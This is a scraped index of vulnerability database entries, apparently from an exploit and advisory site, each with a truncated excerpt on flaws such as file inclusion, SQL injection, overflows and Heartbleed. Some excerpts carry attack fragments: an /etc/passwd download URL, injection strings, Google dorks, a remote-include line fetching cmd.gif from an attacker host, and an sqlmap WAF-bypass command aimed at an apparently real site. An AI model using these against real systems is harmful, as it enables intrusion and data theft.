phpoa upLoadOfficeFile.php arbitrary file upload vulnerability
No description provided by source...
Multiple products BMP denial-of-service vulnerability
ACDSee, IrfanView and FastStone Image Viewer are image management and processing programs. ACDSee, IrfanView and FastStone Image Viewer have a problem handling malformed BMP files; a remote attacker can exploit the vulnerability to mount a denial-of-service attack against the application. FastStone Image Viewer 2.9 No solution is currently available: http://www.irfanview.com/ http://www.acdsee.com...
YaPIG 0.95b Remote Code Execution Exploit
No description provided by source. ?php / This module adds a comment file in $giddir . $gid . "" .$phid file Each File will have this format if $SEPARATOR=":"; title:author:date:email:web:message\n if a message contains "\n" character, it will be replaced with "br /" The variables receives by the...
Mambo AkoComment Module mosConfig_absolute_path remote file inclusion vulnerability
Mambo AkoComment is a PHP-based web application. Mambo AkoComment does not properly filter user-submitted URI data; a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'akocomments.php' script lacks filtering of the user-submitted 'mosConfig_absolute_path' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with web process privileges. Arthur Konze WebDesign AkoComment 1.1 http://www.konze.de/...
Dr.COM DrcomManager arbitrary file download vulnerability
No description provided by source...
Microsoft IIS FTPd service NLST command remote stack overflow vulnerability
BUGTRAQ ID: 36189 CVE(CAN) ID: CVE-2009-3023 Microsoft Internet Information Services (IIS) is a network information server bundled with Microsoft Windows that includes HTTP service functionality. A stack overflow vulnerability exists in the FTP server embedded in Microsoft IIS. If a remote attacker issues an FTP NLST (NAME LIST) command containing wildcards against a directory with a specially crafted name, the overflow can be triggered, leading to arbitrary code execution. A directory with such a special name can only be created if the attacker has write access. Microsoft IIS 6.0 Microsoft IIS 5.0 Vendor patch: Microso...
JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit
No description provided by source. JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit SQL Injection Code input name="author" type="text" value="UniquE-Key'UNION SELECT...
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
No description provided by source. S-Gästebuch //'=============================================================================================== //'Script Name: S-Gästebuch //'Dork Ex. : http://www.google.com.tr/search?q=VS-G%C3%A4stebuch+V.+%C2%A9&hl=tr&start=10&sa=N //'S.Page :...
Downline Goldmine paidversion (tr.php id) - SQL Injection Vulnerability
No description provided by source. paidversion tr.php id Remote SQL Injection Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc script : http://www.downlinegoldmine.com/ DorK : inurl:tr.php?id= Exploit :...
PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability
No description provided by source. -------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation php.ini independent by Nine:Situations:Group::bookoo...
MediaWiki remote code execution vulnerability
CVE ID: CVE-2014-1610 MediaWiki is a free, open-source web-based wiki engine developed and maintained by the US Wikimedia Foundation together with MediaWiki volunteers; it can be used to deploy internal knowledge management and content management systems. An input validation vulnerability exists in MediaWiki because the thumb.php script does not properly filter the 'page' parameter. When support for uploading DjVu or PDF files is enabled, a remote attacker can exploit this vulnerability via specially crafted shell metacharacters to execute arbitrary commands. The following versions are affected: MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5, 1.19.x before 1.19.11. 0 MediaWik...
Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability
No description provided by source. =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo com_serverstat Component <= 0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron turkish...
Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support
No description provided by source. / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted...
Dahan Bantong (大汉版通) JCMS content management system arbitrary file download vulnerability
Brief description: Arbitrary file download in several places; the affected versions are unknown, but probably all are affected. Details: 1. http://target/jcms/m59/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt To obtain the site path, visit http://target/jcms/m59/sendreport/ and then generate a report; the path is shown there. 2...
ueditor 1.2.2.0 fileUp.jsp file upload vulnerability
No description provided by source...
PHPCodeGenie Core.PHP remote file inclusion vulnerability
PHPCodeGenie is a PHP-based content management program. PHPCodeGenie does not properly filter user-submitted URI data; a remote attacker can exploit the vulnerability to execute arbitrary commands with web process privileges. The problem is that the 'core.php' script lacks filtering of the user-submitted 'BeautPath' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with web process privileges. phpCodeGenie phpCodeGenie 3.0.2 http://sourceforge.net/projects/phpcodegenie/...
Joomla versions 1.5 - 3.4 remote command execution vulnerability
Send requests to it with a prepared script (injecting a malicious User-Agent that gets stored in the database Session Data), where the User-Agent is:...
OpenSSL 'EVP_VerifyFinal' function signature verification vulnerability
BUGTRAQ ID: 33150 CVE ID: CVE-2008-5077 CNCVE ID: CNCVE-20085077 OpenSSL is an open-source SSL implementation used to provide strong encryption for network communications. Some OpenSSL functions, when verifying DSA and ECDSA keys, do not correctly check the return value of the 'EVP_VerifyFinal' function; sending a specially crafted signed certificate chain to the client can bypass the signature check. Through a malicious server or a man-in-the-middle attack, a malformed SSL/TLS signature in the certificate chain can bypass the client software's checks, leading to blind trust and leakage of sensitive information. Successful exploitation requires the server to use a certificate containing a DSA or ECDSA key. Ubuntu Ubuntu Linux 8.10 spar...
Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit
No description provided by source. !-- Toshiba Surveillance Surveillix RecordSend Class MeIpCamX.DLL 1.0.0.4 remote buffer overflow exploit IE7/xpsp2 a demo camera: http://wb02-demo.surveillixdvrsupport.com/Ctl/index.htm?Cus?Audio codebase: http://wb02-demo.surveillixdvrsupport.com/Ctl/MeIpCamX.c...
xiuno bbs XSS vulnerability
Xiuno BBS 4.0.0 backend XSS vulnerability 1. What is Xiuno BBS 4.0? It is a domestically developed, compact and stable lightweight forum that keeps its high load capacity even with large volumes of data. It has only about 20 tables, its compressed source code is around 1 MB, and it runs very fast: a single request is handled in the 0.01-second range, and with APC, Yac or XCache available it can reach 0.00x seconds. It has few third-party library dependencies. The author likens it to a hand-built Ferrari: powerful, without an ounce of fat, easy to deploy and maintain, and a very good foundation for secondary development. 2. Vulnerability details In the Xiuno BBS 4.0.0 backend, Settings - Basic Settings - Site Name is insufficiently filtered and has an XSS vulnerability. Enter XSS in the site name field...
initroot: Bypassing Nexus 6 Secure Boot through Kernel Command-line Injection
In the May 2017 Android Security Bulletin, Google released a patch to a critical and unique vulnerability CVE-2016-10277 in the Nexus 6 bootloader we had found and responsibly disclosed. By exploiting the vulnerability, a physical adversary or one with authorized-ADB/fastboot USB access to the...
TLS Renegotiation Vulnerability PoC
No description provided by source. !/usr/bin/env python RedTeam Pentesting GmbH [email protected] http://www.redteam-pentesting.de PoC exploit for the TLS renegotiation vulnerability CVE-2009-3555 License ------- CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ Timeline -------...
Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit
No description provided by source. ypk.c: /update: kcope/year2008/tested on SunOS 5.10// KEYSERV/YPUPDATED SunOS 4.1.3/RPC SERVICES ...
Linux kernel 'udp.c' remote code execution vulnerability (CVE-2016-10229)
The Linux kernel allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag. This may create a kernel panic or memory corruption leading to privilege escalation...
Qingguo (青果) educational administration system /xsweb/pub/temp.aspx nj parameter SQL injection vulnerability
Vulnerable file: /xsweb/pub/temp.aspx?type=ajax&fellowXh=wooyun The system is protected by a WAF; using the --tamper parameter is enough to bypass it and continue the injection sqlmap.py -u "http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun" --tamper "equaltolike.py" --dbms mssql...
WeBid 0.7.3 RC9 (upldgallery.php) Remote File Upload Vulnerability
No description provided by source. ----------------------------------------------------------------------------------------- Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote...
Joomla extended_registration component remote file inclusion vulnerability
extended_registration is a component that provides extended registration support in Mambo (also known as Joomla). The extended_registration component has an input validation vulnerability when handling user requests; a remote attacker may exploit it to execute arbitrary commands on the server with web process privileges. The extended_registration component does not properly validate the input of the mosConfig_absolute_path parameter, allowing an attacker to include arbitrary local or remote resource files and execute arbitrary PHP code. The vulnerable code in admin.extended_registration.php is as follows: <?php require "../configuration.php"; functi...
Yonyou GRP-U8 financial management software userInfoWeb interface sensitive information disclosure vulnerability
No description provided by source...
TurboMail front-end SQL injection vulnerability
Brief description: The front end has an injection that can be used to read the administrator password and even obtain a shell. Details: 0x1 Front-end injection turbomail\web\webapps\ROOT\enterprise\noteadd.jsp: ... UserInfo userinfo = ms.userinfo; if (userinfo == null) { XInfo.gotoInfo(ms, request, response, "info.loginfail", null, 0); return; } String id = request.getParameter("id"); // the id parameter is passed in without any filtering Note note = null;...
Oracle (oidldapd connect) Local Command Line Overflow Exploit
No description provided by source. / Exploit Code for oidldapd in Oracle 8.1.6 8ir2 for Linux. I tested in RH 6.2 and 6.1. This code is a bullshit i know please no comments about ;-. If someone exports this to Sparc please tell me. synopsis: buffer overflow in oidldapd...
Yonyou OA /yyoa/checkWaitdo.jsp injection vulnerability
No description provided by source...
Microsoft Windows Internet Printing Service integer overflow vulnerability (MS08-062)
BUGTRAQ ID: 31682 CVE(CAN) ID: CVE-2008-1446 Microsoft Windows is the very popular operating system released by Microsoft. The Internet Printing Protocol ISAPI extension of IIS has an integer overflow vulnerability when handling specially crafted IPP responses. If a Windows system is running IIS with the Internet Printing service enabled, a remote attacker can trigger the overflow by using a specially crafted HTTP POST request to lure the affected server into connecting to a malicious IPP server, leading to execution of arbitrary instructions. Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP1...
DedeCMS 5.7 SP1 /install/index.php remote file inclusion vulnerability
1. Vulnerability analysis /install/index.php.bak or index.php php $s_lang = 'utf-8'; $install_demo_name = 'dedev57demo.txt'; $insLockfile = dirname(__FILE__).'/install_lock.txt'; // variable initialized $moduleCacheFile = dirname(__FILE__).'/modules.tmp.inc'; // variable initialized .... line 29 foreach(Array('_GET','_POST','_COOKIE') as $_request) foreach($$_request as $_k =...
Novell eDirectory 8.8 Long URI iMonitor Buffer Overflow Exploit (meta)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...
Selenium Server unauthorized access vulnerability
1. Introduction Have you ever come across ports in your daily work that look like this when opened in a browser: In the screenshot above I collected several examples on different ports. 2. Selenium - an open-source automated testing tool What exactly is Selenium, the protagonist of this article? Readers with QA or security automation testing experience should already know; the following text is from Baidu Baike: Selenium is a tool for testing web applications. Selenium tests run directly in the browser, just as a real user would operate it. Supported browsers include IE (7, 8, 9, 10, 11), Mozilla Firefox, Safari, Google Chrome, Opera and others. It supports automatic recording of actions and automatic generation...
beescms 4.0 arbitrary file upload vulnerability #3
No description provided by source...
"Huge Dirty COW" (CVE-2017-1000405)
The "Dirty COW" vulnerability CVE-2016-5195 is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast — millions of users could be compromised easily and reliably, bypassing...
Multiple Vulnerabilities in TP-Link TL-SG108E(CVE-2017-17745, CVE-2017-17746, CVE-2017-17747)
Overview Three vulnerabilities have been discovered in the TP-Link TL-SG108E, firmware 1.0.0 Build 20160722 Rel.50167: CVE-2017-17745 - Cross Site Scripting XSS in systemnameset.cgi, sysName parameter CVE-2017-17746 - Weak access control for user authentication CVE-2017-17747 - Weak access contro...
Dnsmasq heap-based overflow (CVE-2017-14492)
1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i --name dnsmasqtest dnsmasq bash docker cp poc.py dnsmasqtest:/poc.py docker exec -it bash 2 On one terminal start dnsmasq: /test/dnsmasqnoasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra...
ProFTPD mod_tls module CA SSL certificate validation vulnerability
BUGTRAQ ID: 36804 CVE ID: CVE-2009-3639 ProFTPD is an open-source FTP server program. ProFTPD's mod_tls module does not correctly handle null characters (\0) in the domain name of the X.509 certificate subject Common Name (CN) field: when processing a certificate field containing a null character, it mistakenly treats the null as a terminator and therefore validates only the part before it. For example, for a name such as: example.com\0.haxx.se the certificate was issued to haxx.se, but the mod_tls module incorrectly validates it for example.com, which helps an attacker carry out phishing and other spoofing via a man-in-the-middle attack. A server is affected by this vulnerability only when the following mod_tls configuration is present:...
Softbiz Auktios Script Multiple SQL Injection Vulnerabilities
No description provided by source. ----------------------------Information------------------------------------------------ +Name : softbiz auktios script sql injection viewitems.php +Autor : Easy Laster +Date : 24.02.2010 +Script : softbiz auktios script +Download : ----- +Demo : http://ezpips.co...
Apache HTTP Server mod_proxy reverse proxy mode security restriction bypass vulnerability
BUGTRAQ ID: 50802 CVE ID: CVE-2011-4317 Apache HTTP Server is the Apache Software Foundation's open-source web server; it runs on most computer operating systems and, because it is cross-platform and secure, is widely used and one of the most popular web server software packages. When the mod_proxy module is configured in reverse proxy mode, Apache HTTP Server mishandles certain web requests; a specially crafted URL can be used to send requests to servers behind the proxy, bypassing certain security restrictions. Apache 2.2.x Apache 2.0.x Vendor patch: Apache Group ------------...
Coppermine Photo Gallery variable content overwrite vulnerability
Coppermine is a multi-purpose integrated web gallery script written in PHP. Coppermine Photo Gallery has a vulnerability in handling user request data; a remote attacker may exploit it to upload PHP script files and thereby take control of the application system. The system's include/init.inc.php script has a problem in its filtering of global variables; a remote attacker can use this to bypass security restrictions and upload arbitrary script files to achieve command execution. Exploiting this vulnerability requires the system's PHP to have the register_globals option enabled. Coppermine Photo Gallery 1.x Coppermine Photo Gallery Temporary workaround:...
Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881)
Source of details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ Do you still have telnet enabled on your Catalyst switches? Think twice, here's a proof-of-concept remote code execution exploit for Catalyst 2960 switch with latest suggested firmware. Check out the exploit code here. What...
Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
No description provided by source. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: Powered By Aardvark Topsites PHP 4.2.2 Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-...
Microsoft Outlook Web Access for Exchange Server 2003 'redir.asp' URI Redirection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31765/info Outlook Web Access is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks. OWA 6.5 SP 2 is...
mozilla-thunderbird multiple security vulnerabilities
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2009:217-1 http://www.mandriva.com/security/ Package : mozilla-thunderbird Date : August 23, 2009 Affected: 2009.1 Problem Description: A number of security vulnerabilities have...
ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability
No description provided by source. ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M ...
AVTECH {DVR/NVR/IPC} IPCP API RCE
!/usr/bin/env python2.7 SOF Subject: AVTECH DVR/NVR/IPC IPCP API admin l/p, RCE 2018 bashis Attack vector: Remote Authentication: Anonymous no credentials needed Researcher: bashis March 2018 Authenticated Reverse Shell; Using admin l/p that we can retrieve with unauthenticated and undocumented...
Cisco ASA Remote Code Execution (CVE-2016-1287)
Remote Code Execution on Cisco ASA A year ago ExodusIntel disclosed a vulnerability affecting the IKE implementation in Cisco’s ASA products. The error is due to an overflow in the checking of reassembled IKE fragments, and allows remote code execution from an unauthenticated attacker. More...